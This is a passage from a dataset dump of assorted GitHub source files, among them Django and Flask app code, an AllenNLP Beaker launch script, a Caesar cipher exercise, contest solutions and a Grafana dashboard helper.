ru_words,\n 'phrases': phrases,\n 'other_forms': other_forms_string,\n 'part_of_speech': part_of_speech_string,\n 'sounds': f'[sound:{keyword}.mp3]',\n })\n return word_data, keyword\n\n\ndef update_csv(word_data, message):\n csvfile = open(f'docs/{message.from_user.id}.csv', 'a', encoding='utf-8')\n c = csv.writer(csvfile)\n c.writerow(word_data.values())\n csvfile.close()\n\n\ndef main(message):\n while True:\n word_data = {}\n word_data, keyword = get_data_from_cambridge(word_data, message)\n word_data, keyword = get_data_from_promt(word_data, keyword)\n update_csv(word_data, message)\n return word_data\n","repo_name":"AlexKivaiko/Ankibot","sub_path":"entoankibot.py","file_name":"entoankibot.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42423115112","text":"from math import sqrt\r\nfrom sys import argv\r\nclass Sample:\r\n def __init__(self,value):\r\n self.C=50\r\n self.H=30\r\n self.value=value\r\n \r\n \r\n def getString(self):\r\n self.listone=[]\r\n for i in self.value:\r\n self.result=sqrt(2 * self.C * int(i)/self.H)\r\n self.listone.append(round(self.result))\r\n print((self.listone))\r\n \r\n\r\nif __name__=='__main__':\r\n args=(argv[1:])\r\n val=args[0].split(',')\r\n print(args[0])\r\n print(type(args))\r\n print(type(val))\r\n obj=Sample(val)\r\n obj.getString()\r\n ","repo_name":"shubha-nanda/Python","sub_path":"scripts/sqrtpract.py","file_name":"sqrtpract.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41911999034","text":"import io\n\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom chat.models import NewGroup\n\nclass ChatTestCase(APITestCase):\n @classmethod\n def setUpTestData(cls):\n get_user_model().objects.create()\n NewGroup.objects.create(group_name=\"g1\", group_description=\"d1\")\n\n def test_chat_creation(self):\n user = get_user_model().objects.first()\n group = NewGroup.objects.first()\n data = {\"sender\": user.id ,\"message\": \"how are you\", \"group_id\":group.id}\n response = self.client.post(\"/chat/chat/\", data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n @classmethod\n def tearDownClass(cls):\n get_user_model().objects.all().delete()\n 
NewGroup.objects.all().delete()","repo_name":"karthikkumar090/TestProject","sub_path":"TestProject/testproject/chat/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72822878012","text":"#! /usr/bin/env python\n\n# Script to launch AllenNLP Beaker jobs.\n\nimport argparse\nimport os\nimport random\nimport subprocess\nimport sys\nfrom typing import List\n\nsys.path.insert(0, os.path.dirname(os.path.abspath(os.path.join(os.path.join(__file__, os.pardir), os.pardir))))\n\nfrom allennlp.commands.train import Train\nfrom allennlp.common.params import Params\n\ndef main(param_file: str, extra_beaker_commands: List[str]):\n ecr_repository = \"896129387501.dkr.ecr.us-west-2.amazonaws.com\"\n commit = subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"], universal_newlines=True).strip()\n image = f\"{ecr_repository}/allennlp/allennlp:{commit}\"\n overrides = \"\"\n\n # Reads params and sets environment.\n params = Params.from_file(param_file, overrides)\n flat_params = params.as_flat_dict()\n env = []\n for k, v in flat_params.items():\n k = str(k).replace('.', '_')\n env.append(f\"--env={k}={v}\")\n\n # If the git repository is dirty, add a random hash.\n result = subprocess.run('git diff-index --quiet HEAD --', shell=True)\n if result.returncode != 0:\n dirty_hash = \"%x\" % random.getrandbits(32)\n image += \"-\" + dirty_hash\n\n # Get temporary ecr login. For this command to work, you need the python awscli\n # package with a version more recent than 1.11.91.\n print(\"Logging into ECR\")\n subprocess.run('eval $(aws --region=us-west-2 ecr get-login --no-include-email)', shell=True, check=True)\n\n print(f\"Building the Docker image ({image})\")\n subprocess.run(f'docker build -t {image} .', shell=True, check=True)\n\n print(f\"Pushing the Docker image ({image})\")\n subprocess.run(f'docker push {image}', shell=True, check=True)\n\n config_dataset_id = subprocess.check_output(f'beaker dataset create --quiet {param_file}', shell=True, universal_newlines=True).strip()\n filename = os.path.basename(param_file)\n\n allennlp_command = [\n \"python\",\n \"-m\",\n \"allennlp.run\",\n \"train\",\n \"/config.json\",\n \"-s\",\n \"/output\",\n \"--file-friendly-logging\"\n ]\n\n # TODO(michaels): add back in the env list.\n # Presently this makes the Beaker UI unusably cluttered.\n command = [\n '/usr/local/bin/beaker',\n 'experiment',\n 'run',\n '--result-path',\n '/output',\n \"--source\",\n f\"{config_dataset_id}:/config.json\",\n '--gpu-count=1'] + env + extra_beaker_commands + [image] + allennlp_command\n print(' '.join(command))\n subprocess.run(command, check=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument('param_file', type=str, help='The model configuration file.')\n parser.add_argument('--desc', type=str, help='A description for the experiment.')\n parser.add_argument('--debug', action='store_true', help='Print verbose stack traces on error.')\n parser.add_argument('--env', action='append', help='Set environment variables (e.g. NAME=value or NAME)')\n parser.add_argument('--mount', action='append', help='Bind a host directory (e.g. /host/path:/target/path)')\n parser.add_argument('--source', action='append', help='Bind a remote data source (e.g. 
source-id:/target/path)')\n parser.add_argument('--cpu', help='CPUs to reserve for this experiment (e.g., 0.5)')\n parser.add_argument('--memory', help='Memory to reserve for this experiment (e.g., 1GB)')\n\n args = parser.parse_args()\n\n extra_beaker_commands = []\n if args.desc:\n extra_beaker_commands.append(f'--desc={args.desc}'),\n if args.debug:\n extra_beaker_commands.append(\"--debug\")\n if args.env:\n extra_beaker_commands.extend([f\"--env={env}\" for env in args.env])\n if args.mount:\n extra_beaker_commands.extend([f\"--mount={mount}\" for mount in args.mount])\n if args.source:\n extra_beaker_commands.extend([f\"--source={source}\" for source in args.source])\n if args.cpu:\n extra_beaker_commands.append(f\"--cpu={args.cpu}\")\n if args.memory:\n extra_beaker_commands.append(f\"--memory={args.memory}\")\n\n main(args.param_file, extra_beaker_commands)\n","repo_name":"deeppavlov/ner-meta","sub_path":"scripts/ai2-internal/run_with_beaker.py","file_name":"run_with_beaker.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"13903148684","text":"\"\"\"\nMisc functions used in other multiple other parts of the bot's code\n\"\"\"\n\nfrom discord.ext import commands\nimport discord\n\n\ndef is_bot_admin(user: discord.User | discord.Member):\n \"\"\"\n Checks if the user is a bot admin\n \"\"\"\n\n return (\n user.id == 229779964898181120\n ) # currently strictly checks if it is me\n\n\nasync def get_or_fetch_channel(bot: commands.Bot, channel_id):\n channel = bot.get_channel(channel_id)\n\n if channel is None:\n channel = await bot.fetch_channel(channel_id)\n\n return channel\n\n\nasync def get_or_fetch_message(channel, message_id):\n try:\n return await channel.fetch_message(message_id)\n except:\n return None\n","repo_name":"arcinfini/pyhnix","sub_path":"internal/utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26659411138","text":"print(\"\"\" \r\n ,adPPYba, ,adPPYYba, ,adPPYba, ,adPPYba, ,adPPYYba, 8b,dPPYba, \r\na8\" \"\" \"\" `Y8 a8P_____88 I8[ \"\" \"\" `Y8 88P' \"Y8 \r\n8b ,adPPPPP88 8PP\"\"\"\"\"\"\" `\"Y8ba, ,adPPPPP88 88 \r\n\"8a, ,aa 88, ,88 \"8b, ,aa aa ]8I 88, ,88 88 \r\n `\"Ybbd8\"' `\"8bbdP\"Y8 `\"Ybbd8\"' `\"YbbdP\"' `\"8bbdP\"Y8 88 \r\n 88 88 \r\n \"\" 88 \r\n 88 \r\n ,adPPYba, 88 8b,dPPYba, 88,dPPYba, ,adPPYba, 8b,dPPYba, \r\na8\" \"\" 88 88P' \"8a 88P' \"8a a8P_____88 88P' \"Y8 \r\n8b 88 88 d8 88 88 8PP\"\"\"\"\"\"\" 88 \r\n\"8a, ,aa 88 88b, ,a8\" 88 88 \"8b, ,aa 88 \r\n `\"Ybbd8\"' 88 88`YbbdP\"' 88 88 `\"Ybbd8\"' 88 \r\n 88 \r\n 88 \r\n\"\"\")\r\n\r\n\r\ndef encrypt(message: str, shift: int) -> str:\r\n \"\"\"\r\n\r\n :param message: string to be encrypted\r\n :param shift: number of positions each letter in message needs to be shifted\r\n by\r\n :return: encrypted string\r\n \"\"\"\r\n # upper ascii = [65, 90]\r\n # lower ascii = [97, 122]\r\n\r\n encrypted_msg = \"\"\r\n\r\n for letter in message:\r\n if letter == \" \":\r\n encrypted_msg += \" \"\r\n continue\r\n\r\n ascii_letter = ord(letter)\r\n shift_ascii = ascii_letter + shift\r\n\r\n if (letter.isupper() and shift_ascii > 90):\r\n shift_ascii = shift_ascii - 26\r\n\r\n if (letter.islower() and shift_ascii > 122):\r\n shift_ascii = shift_ascii - 26\r\n\r\n encrypted_msg += chr(shift_ascii)\r\n\r\n return encrypted_msg\r\n\r\n\r\ndef decrypt(message: str, shift: 
int) -> str:\r\n \"\"\"\r\n\r\n :param message: string to be decrypted\r\n :param shift: number of positions each letter in message was shifted by\r\n :return: decrypted string\r\n \"\"\"\r\n # upper ascii = [65, 90]\r\n # lower ascii = [97, 122]\r\n\r\n decrypted_msg = \"\"\r\n\r\n for letter in message:\r\n if letter == \" \":\r\n decrypted_msg += \" \"\r\n continue\r\n\r\n ascii_letter = ord(letter)\r\n shift_ascii = ascii_letter - shift\r\n\r\n if (letter.isupper() and shift_ascii < 65):\r\n shift_ascii = shift_ascii + 26\r\n\r\n if (letter.islower() and shift_ascii < 97):\r\n shift_ascii = shift_ascii + 26\r\n\r\n decrypted_msg += chr(shift_ascii)\r\n\r\n return decrypted_msg\r\n\r\n\r\ndef caesar_cipher(action: str, message: str, shift: int) -> str:\r\n \"\"\"\r\n\r\n :param action: whether user wants to encrypt or decrypt\r\n :param message: message to be encrypted or decrypted\r\n :param shift: number of positions each letter in message is shifted by\r\n :return: encrypted or decrypted message\r\n \"\"\"\r\n msg = \"\"\r\n if action == 'encode':\r\n msg = encrypt(message, shift)\r\n\r\n if action == 'decode':\r\n msg = decrypt(message, shift)\r\n\r\n return msg\r\n\r\n\r\nagain = \"yes\"\r\nwhile again == \"yes\":\r\n user_action = input(\r\n \"Type 'encode' to encrypt, type 'decode' to decrypt: \").lower()\r\n while user_action not in ['encode', 'decode']:\r\n user_action = input('Invalid command. Please try again.')\r\n\r\n user_message = input(\"Type your message: \")\r\n\r\n user_shift = int(input(\"Type the shift number: \"))\r\n\r\n print(\r\n f'Your {user_action}d message is: {caesar_cipher(user_action, user_message, user_shift)}')\r\n again = input(\r\n \"Type 'yes' if you want to go again. Otherwise, type 'no': \").lower()\r\n","repo_name":"InfinityCent/100_Days_Of_Code","sub_path":"Projects/Day8-CaesarCipher.py","file_name":"Day8-CaesarCipher.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29920796731","text":"\"\"\"'''思路:\n思路一: 库函数'''\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n for i in range(len(nums) + 1):\n for tmp in itertools.combinations(nums, i):\n res.append(tmp)\n return res\n\n\n'''思路二: 迭代'''\n\n\nclass Solution1:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = [[]]\n for i in nums:\n res = res + [[i] + num for num in res]\n return res\n\n\n\"\"\"思路三: 递归(回溯算法)\"\"\"\n\n\nclass Solution2:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n n = len(nums)\n\n def helper(i, tmp):\n res.append(tmp)\n for j in range(i, n):\n helper(j + 1, tmp + [nums[j]])\n\n helper(0, [])\n return res","repo_name":"ANh0r/LeetCode-Daily","sub_path":"9.20 subsetAll.py","file_name":"9.20 subsetAll.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71430530493","text":"import logging\n\n\ndef get_logger(mod_name: str, file_name: str):\n logger = logging.getLogger(mod_name)\n logger.setLevel(logging.INFO)\n logger.propagate = False\n handler = logging.FileHandler(file_name)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter(fmt='%(asctime)s [%(name)s %(funcName)s] %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return 
logger\n\n\n","repo_name":"zhaochj/mschedule","sub_path":"agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"37729648768","text":"from rest_framework import serializers\n\nfrom marketapp.models import (\n Category,\n Product,\n ProductCategoryM2M,\n # ProductFeatureM2M,\n)\nfrom restapiapp.categoriesapi.serializers import CategorySerializer\n# from restapiapp.featuresapi.serializers import (\n# # FeatureSerializer,\n# # FeatureValuesSerializer,\n# )\nfrom utils.serializers import (\n LogoModelSerilizerMixin,\n IsActiveTrueSerializerMixin,\n)\n\n\n# class ProductFeatureM2MSerializer(serializers.ModelSerializer):\n# \"\"\"Сериалайзер для множественной связи Свойств и Продуктов\"\"\"\n# featurevalue = FeatureValuesSerializer(\n# label='Значение свойства продукта',\n# help_text='Значение свойства продукта',\n# read_only=True,\n# )\n#\n# class Meta:\n# model = ProductFeatureM2M\n# fields = (\n# # 'feature',\n# 'featurevalue',\n# )\n\n\nclass ProductSerializer(\n LogoModelSerilizerMixin,\n IsActiveTrueSerializerMixin,\n serializers.ModelSerializer\n):\n \"\"\"\n Сериалайзер для товара\n \"\"\"\n\n user = serializers.CharField(\n source='user.username',\n label='Пользователь',\n help_text='Создатель товара',\n read_only=True,\n )\n # feature_set = ProductFeatureM2MSerializer(\n # source='productfeaturem2m_set',\n # read_only=True,\n # many=True,\n # )\n\n class Meta:\n model = Product\n fields = (\n 'uuid',\n 'is_active',\n 'name',\n 'desc',\n 'logo',\n 'logo_small',\n 'logo_big',\n 'logo_large',\n 'time_updated',\n 'time_created',\n 'time_publish',\n 'time_depublish',\n 'user',\n 'price',\n 'temporary_price',\n 'rating',\n 'owner_rating',\n # 'feature_set',\n )\n\n\nclass ProductCategorySerialzer(serializers.ModelSerializer):\n \"\"\"Сериалайзер для отображения категории в API для продукта\"\"\"\n category = serializers.SlugRelatedField(\n slug_field='uuid',\n queryset=Category.objects.all(),\n label=ProductCategoryM2M._meta.get_field('category').verbose_name,\n help_text='uuid категории, связанной с продуктом',\n )\n category_detail = CategorySerializer(\n source='category',\n read_only=True,\n )\n\n class Meta:\n model = ProductCategoryM2M\n fields = (\n 'category',\n 'category_detail',\n )\n\n\nclass CategoryProductSerialzer(serializers.ModelSerializer):\n \"\"\"Сериалайзер для отображения продукта в API для категории\"\"\"\n product = serializers.SlugRelatedField(\n slug_field='uuid',\n queryset=Product.objects.all(),\n label=ProductCategoryM2M._meta.get_field('product').verbose_name,\n help_text='uuid продукта, связанного с категорией',\n )\n product_detail = CategorySerializer(\n source='product',\n read_only=True,\n )\n\n class Meta:\n model = ProductCategoryM2M\n fields = (\n 'product',\n 'product_detail',\n )\n\n\nclass ProductCategoryM2MSerializer(ProductCategorySerialzer, CategoryProductSerialzer):\n \"\"\"\n Сериалайзер для связи Product-Category\n \"\"\"\n\n class Meta:\n model = ProductCategoryM2M\n fields = (\n 'category',\n 'product',\n 'category_detail',\n 'product_detail',\n )\n\n","repo_name":"smokost/CV","sub_path":"portfolio/Django-Market/restapiapp/productsapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19489170473","text":"from __future__ import annotations\nimport torch\nfrom random 
import shuffle\n\nclass FlipNotPossible(Exception): pass\nclass SortNotPossible(Exception): pass\n\nclass Stack:\n \"\"\"Class to represent pancake stacks as declared by BWINF 41 in 2023 challenge 3.\"\"\"\n def __init__(self, items: list) -> None:\n self.height = len(items)\n self.pancakes = items\n \n def __len__(self) -> int:\n return len(self.pancakes)\n \n def flip(self, pos: int) -> None:\n \"\"\"Takes all pancakes before pos, flips them and then deletes the topmost pancake\n \n Args:\n pos (int): Where the stack will be flipped\n\n Raises:\n FlipNotPossible: When the given pos is outside of the range 0-height\n \"\"\"\n if pos > len(self.pancakes): raise FlipNotPossible\n rest = self.pancakes[pos:]\n toFlip = self.pancakes[:pos]\n toFlip.reverse()\n self.pancakes = toFlip + rest\n self.pancakes.pop(0)\n \n def is_sorted(self) -> bool:\n \"\"\"\n Returns:\n bool: True when self.pancakes is sorted.\n \"\"\"\n return self.pancakes == sorted(self.pancakes)\n\n def print(self, pre=\"\", post=\"\"):\n \"\"\"Prints `self.pancakes`\"\"\"\n print(pre, self.pancakes, post)\n \n def create_random(height: int) -> Stack:\n \"\"\"Returns a randomized Stack where object.height equals given height.\n\n Args:\n height (int): Height of random Stack.\n\n Returns:\n object: Stack object\n \"\"\"\n pancakes = [*range(1, height + 1)]\n shuffle(pancakes)\n return Stack(pancakes)\n \n def as_tensor(self, fill=False, normalized=True) -> torch.Tensor:\n \"\"\"Returns self.pancakes as torch.Tensor with size self.height by adding zeros in front if necessary.\n\n Returns:\n torch.Tensor: self.pancakes as Tensor\n \"\"\"\n out = [0 for _ in range(self.height - len(self.pancakes)) if fill]\n if fill and not normalized:\n out += self.pancakes\n return torch.tensor(out, dtype=torch.float32)\n \n for i in self.pancakes:\n out.append(sorted(self.pancakes).index(i) + 1)\n\n return torch.tensor(out, dtype=torch.float32)\n\n def from_file(filename: str) -> Stack:\n data = []\n with open(filename, \"r\") as file:\n lines = file.readlines()\n for line in range(1, len(lines)):\n out = \"\"\n for i in lines[line]:\n if i == \"\\\\\": break\n out += i\n data.append(int(out))\n return(Stack(data))\n \n def unpack(self) -> list:\n return self.pancakes\n\n def sort_by_ai(self) -> list:\n nets = []\n for i in range(len(self), 1, -1):\n try:\n with open(f\"./nnet/trained_nets/net{i}.save\", \"rb\") as file:\n nets.append(torch.load(file))\n except FileNotFoundError:\n raise FileNotFoundError(\"Not every necessary pretrained NN was found\")\n \n flips = []\n for (i, net) in enumerate(nets):\n if self.is_sorted(): break\n flips.append(net(self.as_tensor()).argmax().item() + 1)\n self.flip(flips[-1])\n return flips","repo_name":"TeeFederFisch/BWINF_r2","sub_path":"Aufgabe3/AusfuehrbaresProgramm/nnet/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26279515950","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\nclass Renderer:\r\n\r\n def __init__(self, grid, cell_size=1):\r\n self.grid = grid\r\n self.cell_size = cell_size\r\n width, height = self.grid.size\r\n self.fig, self.ax = plt.subplots(figsize=(width * self.cell_size / 80, height * self.cell_size / 80))\r\n self.image = self.ax.imshow(self.grid.grid.compute(), cmap='gray_r', interpolation='nearest', aspect='auto')\r\n plt.axis('off')\r\n\r\n def update(self, *args):\r\n 
self.grid.evolve()\r\n self.image.set_array(self.grid.grid.compute())\r\n return self.image,\r\n\r\n def render(self, epochs, record=False):\r\n ani = animation.FuncAnimation(self.fig, self.update, epochs, blit=True)\r\n if record:\r\n try:\r\n writer = animation.writers['ffmpeg'](fps=10, metadata=dict(artist='Conway\\'s Game of Life'))\r\n ani.save(\"game_of_life.mp4\", writer=writer)\r\n except RuntimeError:\r\n print('Error: ffmpeg is not installed. Please install it to record the video.')\r\n return ani\r\n","repo_name":"nalienffxi/Game_of_Life","sub_path":"renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7908419127","text":"from collections import deque\r\nimport sys\r\nimport os\r\n\r\nscript_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\r\n# rel_path = 'running_on_fumes_chapter_1_input_sample.txt'\r\nrel_path = 'running_on_fumes_chapter_1_input.txt'\r\nabs_file_path = os.path.join(script_dir, rel_path)\r\nin_file = open(abs_file_path, 'r')\r\n\r\nout_file_check = True\r\nrel_path = rel_path.replace('_input', '_output')\r\nabs_file_path = os.path.join(script_dir, rel_path)\r\nout_file = open(abs_file_path, 'w')\r\n\r\ndef printf(s, linebreak = True):\r\n #print(s) \r\n if out_file_check:\r\n if linebreak:\r\n out_file.write(s + '\\n')\r\n else:\r\n out_file.write(s)\r\n\r\ndef running_on_fumes_chapter_1():\r\n N, M = map(int, in_file.readline().strip().split())\r\n C = [int(in_file.readline()) for _ in range(N)]\r\n dq = deque([(0, 0)])\r\n for i in range(1, len(C)):\r\n count = 0\r\n if dq and i-dq[0][0] > M:\r\n count += 1\r\n dq.popleft()\r\n if not dq:\r\n return -1\r\n if not C[i]:\r\n continue\r\n #print(dq[0][1],C[i])\r\n d = dq[0][1] + C[i]\r\n while dq and dq[-1][1] >= d:\r\n dq.pop()\r\n dq.append((i, d)) \r\n return dq[0][1]\r\n\r\nt = int(in_file.readline())\r\nfor case in range(t):\r\n check_result = running_on_fumes_chapter_1()\r\n if(case < t - 1):\r\n printf('Case #{}: {}'.format(case+1, check_result))\r\n else:\r\n printf('Case #{}: {}'.format(case+1, check_result), linebreak=False)\r\nout_file.close()\r\n\r\n","repo_name":"radadiyamohit81/Facebook_HackerCup-2020","sub_path":"Chap-1/Running_Fumes-chap1.py","file_name":"Running_Fumes-chap1.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"377844955","text":"\"\"\"\ninitializer\n\nCreated by: Martin Sicho\nOn: 7/16/20, 1:54 PM\n\"\"\"\nfrom genui.compounds.extensions.fileimports.initializer import FileInitializer\nfrom genui.compounds.models import ActivityUnits, ActivityTypes, Activity, ActivitySet\nfrom genui.utils.exceptions import GenUIException\nfrom .models import CSVMolecule\n\nclass CSVParsingError(GenUIException):\n pass\n\nclass CSVSetInitializer(FileInitializer):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.activitySet = None\n\n def parserCallback(self, smile, props):\n molecule = self.addMoleculeFromSMILES(smile, CSVMolecule, {'name' : props['name']})\n print(f'Imported molecule: {molecule.name}')\n\n # attach activities\n if 'activityType' in props and 'activity' in props:\n value = props['activity']\n if not value or value == self.instance.emptyValue or type(value) not in (int, float):\n self.errors.append(CSVParsingError(None, f'Failed to parse an activity value ({value}) for molecule {molecule.name} 
: {smile}'))\n return\n value = float(value)\n\n _type = props['activityType']\n if not _type or _type == self.instance.emptyValue or type(_type) != str:\n self.errors.append(CSVParsingError(None, f'Failed to parse activity type ({_type}) for molecule {molecule.name} : {smile}'))\n return\n _type = ActivityTypes.objects.get_or_create(value=_type)[0]\n\n if not self.activitySet:\n self.activitySet = ActivitySet.objects.create(\n name=f'{self.instance.name} (activities from file)',\n project=self.instance.project,\n molecules=self.instance,\n )\n\n units = props['activityUnits']\n units = None if not units or type(units) != str else ActivityUnits.objects.get_or_create(value=units)[0]\n\n Activity.objects.create(\n value=value,\n type=_type,\n units=units,\n source=self.activitySet,\n molecule=molecule\n )\n print(f\"Imported activity value: {_type.value} = {value} {units.value if units else ''}\")\n\n def populateInstance(self):\n self.parseMols(self.parserCallback)\n return self.unique_mols\n\n","repo_name":"martin-sicho/genui","sub_path":"src/genui/compounds/extensions/csvimports/initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"81"} +{"seq_id":"4354827037","text":"# Load /split training/testing data\n\nimport pickle\nfrom sklearn.model_selection import train_test_split\n\nSEED = 20171110\n\nclass DetectionData:\n def __init__(self, graphic, even=False, train_size=None):\n self.x_train, self.x_test, self.y_train, self.y_test = get_data(graphic, even, 1, train_size)\n\n\nclass LocationData:\n def __init__(self, graphic, train_size=None):\n self.x_train, self.x_test, self.y_train, self.y_test = get_data(graphic, False, 2, train_size)\n\ndef get_data (graphic, even, type, train_size):\n x_set = []\n y_set = []\n\n if graphic == 'combined' or graphic == 'both':\n graphics = ['heterographic', 'homographic']\n even = False # don't use even when running with both types as I think there would be some repeat data using even?\n else:\n graphics = [graphic]\n\n for g in graphics:\n\n path = \"./data/pickles/test-%d-%s\" % (type, g)\n\n\n if even:\n path += \"-even\"\n\n path += \".pkl.gz\"\n\n with open(path, 'rb') as f:\n x, y = pickle.load(f)\n x_set += x\n\n if graphic == 'both' and g == 'heterographic':\n if type == 1:\n y_set += list(map(lambda x: 2 if x == 1 else 0, y))\n else :\n # Can't currently use both for location data so just use combined for now\n y_set += y\n else:\n y_set += y\n\n return train_test_split(x_set, y_set, random_state=SEED, train_size=train_size)\n\n\n","repo_name":"hneutr/pun_classifier","sub_path":"pun_data.py","file_name":"pun_data.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71335757386","text":"\"\"\"Push and pull Grafana dashboards.\"\"\"\nfrom typing import Optional, Tuple\n\nfrom grafana_client import GrafanaApi\n\nfrom grafanarmadillo._util import project_dashboard_identity\nfrom grafanarmadillo.types import (\n\tDashboardContent,\n\tDashboardSearchResult,\n\tFolderSearchResult,\n)\n\n\nclass Dashboarder(object):\n\t\"\"\"Collection of methods for managing dashboards.\"\"\"\n\n\tdef __init__(self, api: GrafanaApi) -> None:\n\t\tsuper().__init__()\n\t\tself.api = api\n\n\tdef get_dashboard_content(self, dashboard: DashboardSearchResult) -> DashboardContent:\n\t\t\"\"\"Get the contents of a Grafana dashboard.\"\"\"\n\t\treturn 
self.api.dashboard.get_dashboard(dashboard[\"uid\"])[\"dashboard\"]\n\n\tdef set_dashboard_content(\n\t\tself, dashboard: DashboardSearchResult, content: DashboardContent\n\t):\n\t\t\"\"\"\n\t\tSet the content of a Grafana dashboard.\n\t\t\n\t\tThis explicitly leaves out the identity information.\n\t\tThat allows you to graft the contents of a dashboard into another\n\t\t\"\"\"\n\t\tnew_dashboard = dashboard.copy()\n\t\tnew_content = content.copy()\n\n\t\tnew_content.update(project_dashboard_identity(new_dashboard))\n\n\t\tnew_dashboard.update({\"dashboard\": new_content, \"overwrite\": True})\n\n\t\treturn self.api.dashboard.update_dashboard(new_dashboard)\n\n\tdef import_dashboard(\n\t\tself, content: DashboardContent, folder: Optional[FolderSearchResult] = None\n\t):\n\t\t\"\"\"Import a dashboard into Grafana, optionally into a folder.\"\"\"\n\t\tcontent.pop(\"id\", None)\n\t\tnew_dashboard = {\"dashboard\": content, \"overwrite\": True}\n\t\tif folder:\n\t\t\tnew_dashboard.update({\"folderUid\": folder[\"uid\"], \"folderId\": folder[\"id\"]})\n\n\t\treturn self.api.dashboard.update_dashboard(new_dashboard)\n\n\tdef export_dashboard(\n\t\tself, dashboard: DashboardSearchResult\n\t) -> Tuple[DashboardContent, Optional[FolderSearchResult]]:\n\t\t\"\"\"Export a dashboard from grafana, with its folder information if applicable.\"\"\"\n\t\tresult = self.api.dashboard.get_dashboard(dashboard[\"uid\"])\n\t\tmeta, dashboard = result[\"meta\"], result[\"dashboard\"]\n\t\tif meta[\"folderUid\"]:\n\t\t\tfolder = self.api.folder.get_folder(meta[\"folderUid\"])\n\t\telse:\n\t\t\tfolder = None\n\n\t\treturn dashboard, folder\n","repo_name":"lilatomic/grafanarmadillo","sub_path":"src/grafanarmadillo/dashboarder.py","file_name":"dashboarder.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73703084426","text":"import os\n\nfrom flask import Flask\nfrom flask_login import LoginManager\nfrom pony.flask import Pony\n\nfrom .cache import cache\nfrom .models import db, User\nfrom .views import users as users_view, contests as contests_view\n\napp = Flask(__name__)\n\nconfig_class = (os.getenv('FLASK_ENV') or 'test').title() + 'Config'\napp.config.from_object(f'aivivn_backend.config.{config_class}')\n\ndb.bind(**(app.config['PONY_PROVIDER']))\ndb.generate_mapping(create_tables=app.config['ENV'] != 'production')\n\nPony(app)\n\nlogin_manager = LoginManager(app)\n\ncache.init_app(app, config=app.config)\n\n\n@login_manager.header_loader\ndef load_user_from_header(header_val):\n access_token = header_val.replace('Bearer ', '', 1)\n return User.get_user_from_token(access_token)\n\n\n@app.route('/ping')\ndef ping():\n return 'pong'\n\n\napp.register_blueprint(users_view.bp)\napp.register_blueprint(contests_view.bp)\n","repo_name":"thang148/DEV","sub_path":"backend/aivivn_backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7410632073","text":"from collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\n# N, M <= 50\nN, M = map(int, input().rstrip().split())\n\nmaps = [list(input().rstrip()) for _ in range(N)]\n\nstart_r, start_c = -1, -1\nfor r in range(N):\n for c in range(M):\n if maps[r][c] == '0':\n maps[r][c] = '.'\n start_r, start_c = r, c\n\nq = deque()\nvisited = [[[1e9 for _ in range(2**6)] for _ in range(M)] for _ in range(N)]\n\nq.append((0, start_r, 
